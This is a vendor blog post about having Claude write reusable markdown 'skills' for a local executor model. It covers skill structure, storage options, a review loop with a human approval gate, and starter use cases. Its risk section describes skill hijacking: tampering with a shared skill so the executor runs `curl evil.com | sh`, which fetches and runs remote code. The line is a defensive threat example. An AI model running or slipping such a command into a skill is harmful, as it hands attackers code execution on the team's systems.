Claude Teaches Local AI Through Skills — Planner-Executor EP2

In EP1 — Planner-Executor Pattern we covered Claude thinking + Local AI doing. The follow-up question came up immediately: if Local AI has to handle work it has never done before, how do we "teach" it without fine-tuning the model (which burns GPU and takes days)? The answer is Skills — playbooks that Claude writes as SOPs for Local AI to load when it encounters a matching trigger. This article explains how skills for Local AI differ from skills Claude reads itself, three ways to store skills in an enterprise, the skill review loop that prevents skill drift, and how to roll this out across a real team.

Quick summary — skills in the Planner-Executor context

✓ It is: a markdown playbook + tool list + trigger condition that Local AI loads when it sees matching work — Claude writes and maintains them.

✗ It isn't: fine-tuning, vector-DB embeddings, or a fixed system prompt. A skill loads only when a trigger matches.

Why Skills — The Gap EP1 Doesn't Close

EP1 ends with Claude writing a plan that Local AI executes — which sounds good until Local AI has to do something it has never done before, like "deploy this Angular app to nginx and reload the service." Every time work like that comes in, Claude has to write the plan from scratch, even though it's repetitive work that's 95% identical each time.

That's where skills come in. The first time: Claude thinks, Local AI does, then Claude summarises the run into a skill. From the second time on, Claude just says "use the skill called deploy-angular-nginx," and Local AI loads it and follows along. Claude's token use on that task falls by a further 5–10× compared to EP1.

The corporate analogy

Think of a team lead writing an SOP for new hires. The first time they have to walk through every step. After that, they just say "follow SOP-DEPLOY-007" — the new hire opens the doc, follows it, and the lead doesn't have to repeat themselves. Skills work the same way.

What a Skill Actually Is — The Real Structure

A skill used in the Planner-Executor pattern has four parts, written as a single markdown file:

Part	Purpose	Example
1. Frontmatter	Metadata: name, description, trigger keywords	`name: deploy-angular-nginx`
2. Trigger	Conditions under which Local AI loads this skill	"deploy angular", "ng build + reload nginx"
3. Steps	Explicit sequence of steps (no implicit ones)	step 1: cd /app, step 2: npm run build, ...
4. Tools	Tools this skill is allowed to use	bash, write_file, http_post

A typical Local-AI skill is 300–800 lines of markdown, longer than an ad-hoc plan in EP1 but reusable thousands of times. The economics work out fast.
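To make the four parts concrete, here is a minimal sketch of how an orchestrator might read a skill file and decide whether it applies to a request. The file layout is an assumption made for illustration (triggers and tools are kept in the frontmatter, steps under a `## Steps` heading), and the names `Skill`, `parse_skill` and `matches` are hypothetical, as is the `description` value. The example uses only the two steps named in the table above.

```python
from dataclasses import dataclass, field


@dataclass
class Skill:
    name: str
    triggers: list[str] = field(default_factory=list)
    tools: list[str] = field(default_factory=list)
    steps: list[str] = field(default_factory=list)


def _split_list(value: str) -> list[str]:
    """Split a comma-separated frontmatter value into clean items."""
    return [item.strip() for item in value.split(",") if item.strip()]


def parse_skill(text: str) -> Skill:
    """Parse the assumed layout: '---' frontmatter, then numbered lines under '## Steps'."""
    lines = text.strip().splitlines()
    if not lines or lines[0].strip() != "---":
        raise ValueError("skill must open with a '---' frontmatter line")
    end = next((i for i in range(1, len(lines)) if lines[i].strip() == "---"), None)
    if end is None:
        raise ValueError("frontmatter is never closed")

    meta = {}
    for line in lines[1:end]:
        key, _, value = line.partition(":")
        meta[key.strip()] = value.strip()

    steps, in_steps = [], False
    for line in lines[end + 1:]:
        stripped = line.strip()
        if stripped.startswith("## "):
            in_steps = stripped == "## Steps"
        elif in_steps and stripped[:1].isdigit():
            action = stripped.partition(". ")[2].strip()
            if action:
                steps.append(action)

    return Skill(
        name=meta["name"],
        triggers=_split_list(meta.get("triggers", "")),
        tools=_split_list(meta.get("tools", "")),
        steps=steps,
    )


def matches(skill: Skill, request: str) -> bool:
    """Naive trigger check: any trigger phrase appears in the request text."""
    text = request.lower()
    return any(trigger.lower() in text for trigger in skill.triggers)


EXAMPLE = """\
---
name: deploy-angular-nginx
description: Build an Angular app and reload nginx
triggers: deploy angular, ng build + reload nginx
tools: bash, write_file, http_post
---
## Steps
1. cd /app
2. npm run build
"""

skill = parse_skill(EXAMPLE)
```

Substring matching is the simplest possible trigger rule. A real orchestrator may need something stricter once several skills share similar phrases.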

Claude's Own Skills vs Skills Claude Writes for Local AI

This is where many teams trip up on first contact — they take a skill Claude reads for itself and hand it to Local AI. It doesn't work, because Claude infers implicit context far better than Local AI does.

Dimension	Skill for Claude	Skill for Local AI (e.g. Qwen 32B)
Explicitness	Moderate — Claude infers missing context	Maximum — name the working directory, env vars, commands directly
Typical size	100–300 lines	300–800 lines (3–5× longer)
Error handling	General patterns are enough	List each error case + the matching fix
Decision point	"If this is a production deploy, use flag X"	"If env `STAGE=prod` run step 4a; if `STAGE=staging` run step 4b"
Output format	"return summary"	"return JSON {status, files_changed, log_tail_20_lines}"

The upshot: a Local-AI skill is essentially a script written as markdown — strip out as much ambiguity as possible. That's why Claude has to write the skills, not Local AI — Local AI doesn't know what it can't infer; it's the person who doesn't know what they don't know.
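The "Decision point" and "Output format" rows lend themselves to mechanical checks on the orchestrator side. The sketch below assumes the executor returns the JSON object named in the table, with `files_changed` and `log_tail_20_lines` as lists; those field types, and the function names `validate_report` and `pick_step`, are assumptions for illustration rather than a fixed contract.

```python
import json

# Assumed field types for the report named in the table above.
REQUIRED = {"status": str, "files_changed": list, "log_tail_20_lines": list}


def validate_report(raw: str) -> list[str]:
    """Return a list of problems; an empty list means the report is well-formed."""
    try:
        report = json.loads(raw)
    except json.JSONDecodeError as exc:
        return [f"not valid JSON: {exc.msg}"]
    if not isinstance(report, dict):
        return ["top-level value must be an object"]

    problems = []
    for key, expected in REQUIRED.items():
        if key not in report:
            problems.append(f"missing key: {key}")
        elif not isinstance(report[key], expected):
            problems.append(f"{key} must be a {expected.__name__}")

    tail = report.get("log_tail_20_lines")
    if isinstance(tail, list) and len(tail) > 20:
        problems.append("log_tail_20_lines has more than 20 entries")
    return problems


def pick_step(stage: str) -> str:
    """Explicit branch on STAGE, with no fallback the executor would have to guess."""
    branches = {"prod": "4a", "staging": "4b"}
    if stage not in branches:
        raise ValueError(f"unknown STAGE: {stage!r}")
    return branches[stage]
```

Rejecting an unknown `STAGE` outright, instead of defaulting to one branch, follows the same logic as the skill itself: the executor should never have to infer intent.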

Three Ways to Store Skills

As skills accumulate (you might be at 100–500 within six months), storage matters as much as authoring. Get it wrong and you end up with scattered files nobody can find.

Approach	How it works	Suitable for	Limits
A. Shared folder	Store in `.skills/` inside the repo; Claude and Local AI both read the files directly	Small dev teams of 1–5, fewer than 50 skills	Hard to search at scale; versioning is limited to the repo's own history, with no per-skill versions or metrics
B. MCP Server	Host skills as tools via Model Context Protocol — both models call through the API	Teams already using MCP that want a unified interface	You now have one more service to maintain
C. Skill Registry (DB-backed)	A database with skills + version + metrics (success rate, last used)	Organisations using skills daily, that want A/B testing and audit	Most complex setup, needs a dedicated team

Always start with A. Teams that jump straight to C burn 2–3 months building infrastructure they later have to rework, because they don't yet know which skills they really need. It's the same reason you build ERP process-first, schema-second (see also ERP Implementation — How to Begin When Your Org Wants ERP).

Skill Review Loop — Preventing Skill Drift

The problem teams hit after 1–2 months on this pattern is skill drift — new skills Claude generates look fine, but when Local AI follows them the result is wrong, because the skill was never tested against the actual executor.

The fix is a four-stage skill review loop:

Stage	Who	Work	Pass criteria
1. Generate	Claude	Drafts a skill from a task that has repeated several times	Lint passes (frontmatter complete, every step has an action verb)
2. Dry-run	Local AI	Runs the skill against pre-built test fixtures	≥ 90% success rate over 10 runs
3. Verify	Claude	Reads logs from all 10 runs and checks results against spec	No false positives (no run reported as a success whose output deviates from the spec)
4. Promote	Human (DevOps)	Approves it into the production registry	Human gate before any real use

Stage 4 is the most important. Never let a skill into production without human approval, no matter how good the dry-run looks: fixtures never cover every real-world case. This is the same principle as the audit-trail discussion in AI Internal Audit — Auditing AI in Enterprise Work.
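The pass criteria in the table can be encoded as simple gates. The sketch below is one possible reading, not a prescribed implementation: the action-verb allow-list, the required frontmatter keys and all function names are assumptions, and the Verify stage is reduced to a boolean that Claude's log review would supply.

```python
from typing import Optional

# Hypothetical allow-list; a real lint would need a much longer one.
ACTION_VERBS = {"cd", "run", "copy", "write", "check", "reload", "build"}
REQUIRED_FRONTMATTER = ("name", "description", "triggers")


def lint(frontmatter: dict[str, str], steps: list[str]) -> list[str]:
    """Stage 1: frontmatter complete and every step starts with an action verb."""
    problems = [
        f"missing frontmatter: {key}"
        for key in REQUIRED_FRONTMATTER
        if not frontmatter.get(key)
    ]
    for number, step in enumerate(steps, start=1):
        words = step.split()
        if not words or words[0].lower() not in ACTION_VERBS:
            problems.append(f"step {number} does not start with an action verb")
    return problems


def dry_run_passes(results: list[bool], min_rate: float = 0.9, runs: int = 10) -> bool:
    """Stage 2: exactly `runs` fixture runs, with at least `min_rate` succeeding."""
    return len(results) == runs and sum(results) / runs >= min_rate


def can_promote(
    lint_problems: list[str],
    dry_run_results: list[bool],
    verified_by_claude: bool,
    approved_by: Optional[str],
) -> bool:
    """Stage 4: every earlier gate passed AND a named human signed off."""
    return bool(
        not lint_problems
        and dry_run_passes(dry_run_results)
        and verified_by_claude
        and approved_by is not None
    )
```

Note that `can_promote` has no code path that returns `True` when `approved_by` is `None`, which keeps the human gate from being bypassed by a perfect dry-run.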

⚠️ Risks Specific to a Skill System

1. Skill sprawl

When Claude can write skills easily, teams write a lot of them, and a month in you have 200 skills with 3–4 overlapping ones per task. Local AI doesn't know which to pick. Fix: put a quota on new-skill creation and run a monthly audit that merges duplicates.

2. Skill hijacking

If the registry is open to editing, an insider (or even an AI agent) could modify a widely-used skill to run something dangerous, for example by slipping `curl evil.com | sh` into a step nobody scans carefully. Fix: skills go through code review like real code, with a diff approval workflow.

3. Stale skills

A skill written six months ago may refer to paths or libraries that have since moved. Local AI follows it and it fails. Fix: track last_success_at per skill — if it hasn't been used in a while and then fails, flag it for Claude to regenerate.

4. Over-fitting to one executor

A skill tested against Qwen 32B may not work on Llama 70B, because instruction-following differs per model. Fix: if you plan to run more than one executor, test every skill against every executor before promotion.

Risk	Mitigation	Owner
Skill sprawl	Creation quota + monthly dedupe audit	Tech Lead
Skill hijacking	Code review + diff approval, sign skills with a key	DevOps + Security
Stale skills	Track last_success_at, auto-flag on failure	Orchestrator
Over-fitting executor	Test against every executor before promotion	QA / Tech Lead
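For the "sign skills with a key" mitigation, one lightweight option is an HMAC over the skill text, checked before the executor loads it. This is a sketch under the assumption of a single shared secret held by the promotion step; the function names are hypothetical, and a team that needs separate signer and verifier roles would likely prefer asymmetric signatures instead.

```python
import hashlib
import hmac


def sign_skill(content: str, key: bytes) -> str:
    """Return a hex HMAC-SHA256 signature over the exact skill text."""
    return hmac.new(key, content.encode("utf-8"), hashlib.sha256).hexdigest()


def is_untampered(content: str, signature: str, key: bytes) -> bool:
    """Constant-time comparison of the stored signature with a fresh one."""
    return hmac.compare_digest(sign_skill(content, key), signature)
```

The signature would be recorded at promotion time (stage 4 of the review loop), so any later edit that skips review changes the text and fails the check.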

Real Use Cases — Three Skills Most Teams Start With

If you're building a skill registry for the first time, start with these three — the scope is clear, verification is easy, and ROI shows up fast.

A. Skill: generate-migration

Trigger: when there's a schema diff between dev and staging — Local AI generates the migration script (Alembic / Flyway / hand-written SQL) per the skill's steps. Output is a .sql file plus a rollback script.

B. Skill: write-test-from-bug-report

Trigger: when a Linear/Jira bug report includes reproduction steps. Local AI generates a failing test case (red test) from those steps and drops it into the test suite, ready to turn green once the dev fixes the bug.

C. Skill: changelog-from-commits

Trigger: before a release — Local AI reads git log since the last tag, groups by conventional commit type (feat/fix/chore), and writes CHANGELOG.md in the standard format.

All three have immediately verifiable output (run the test, dry-run the migration in a sandbox, read the CHANGELOG), making them ideal for validating that Claude-written skills actually work for your Local AI.
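As an illustration of how verifiable these outputs are, the grouping logic behind changelog-from-commits fits in a short function. The sketch assumes the commit subjects have already been collected (for example from `git log` over the range since the last tag), handles only the three types named above, and uses section headings picked for this example; the article does not specify the exact CHANGELOG layout.

```python
import re
from collections import defaultdict

# type, optional (scope), optional "!", then ": subject"
COMMIT_RE = re.compile(r"^(?P<type>feat|fix|chore)(\([^)]*\))?!?: (?P<subject>.+)$")
HEADINGS = {"feat": "Features", "fix": "Fixes", "chore": "Chores"}  # assumed labels


def build_changelog(version: str, subjects: list[str]) -> str:
    """Group conventional-commit subjects by type and render a markdown section."""
    groups = defaultdict(list)
    for line in subjects:
        match = COMMIT_RE.match(line.strip())
        if match:  # subjects of other types or free-form text are skipped
            groups[match["type"]].append(match["subject"])

    out = [f"## {version}"]
    for kind, heading in HEADINGS.items():
        if groups[kind]:
            out.append("")
            out.append(f"### {heading}")
            out.extend(f"- {subject}" for subject in groups[kind])
    return "\n".join(out) + "\n"
```

Because the function is deterministic, a dry-run fixture can compare its output byte for byte against an expected section, which is the kind of check the review loop relies on.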

How Saeree ERP Looks at Skills

Developing Saeree ERP means maintaining a lot of modules (accounting, inventory, HR, GFMIS adapter, report engine, etc.) and we hit recurring maintenance work several times a month — "add a new validation rule to form X", "generate a report definition from template Y" — which are strong skill candidates because the pattern is identical every time, only the parameters change.

In the next phase of the AI Assistant Saeree ERP is building, a skill registry is likely to be the key component that lets our on-premise customers "teach" the AI to handle their org-specific customisations — without those skills ever leaving the machine. Same goal as the Planner-Executor pattern in EP1.

Summary — What Skills Add to Planner-Executor

Compared on	EP1 (Planner-Executor as-is)	EP2 (adding Skills)
Repetitive work	Claude writes a fresh plan every time	Claude calls an existing skill — tokens drop 5–10×
New work	Claude thinks, Local AI does	Same, plus if it'll repeat → Claude promotes it to a skill
Executor quality	Depends on each plan	More stable — skills are reviewed
Overhead	None — runs immediately	Maintain a skill registry and a review loop
Right when	Work isn't stable yet, no clear pattern	The same pattern has shown up ≥ 5 times

"Skills are how you let the smart AI write SOPs for the cheap AI — so the cheap AI does the work of the smart AI, on tasks where the pattern is already stable."

A Question to Sit With

Of the work your dev/IT team repeats every week — how many patterns are really "SOPs that were never written down"? If AI helped turn those into runnable skills, how many hours per week would you give back to the team? Count five skill candidates closest at hand — that's the seed of a skill registry in your org.

If you're evaluating an AI architecture that bundles planner + executor + skill registry for use with core internal systems, book a consultation with the Saeree ERP team for help fitting it to your data policy and workflow.

References

Anthropic — Claude Code Skills documentation
Anthropic — Agent Skills announcement
Anthropic — Building Effective Agents — orchestrator-workers pattern
Model Context Protocol — MCP specification (skill-as-tool transport)
Ollama — Qwen2.5-Coder (executor reference model)
